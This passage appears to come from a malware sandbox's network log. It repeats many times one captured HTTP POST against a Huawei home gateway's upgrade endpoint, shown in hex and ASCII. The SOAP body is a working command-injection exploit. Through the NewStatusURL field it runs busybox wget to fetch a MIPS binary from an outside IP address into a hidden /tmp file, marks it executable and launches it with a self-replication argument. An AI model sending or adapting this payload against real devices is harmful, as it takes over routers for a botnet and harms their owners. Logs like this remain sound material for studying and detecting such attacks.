6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 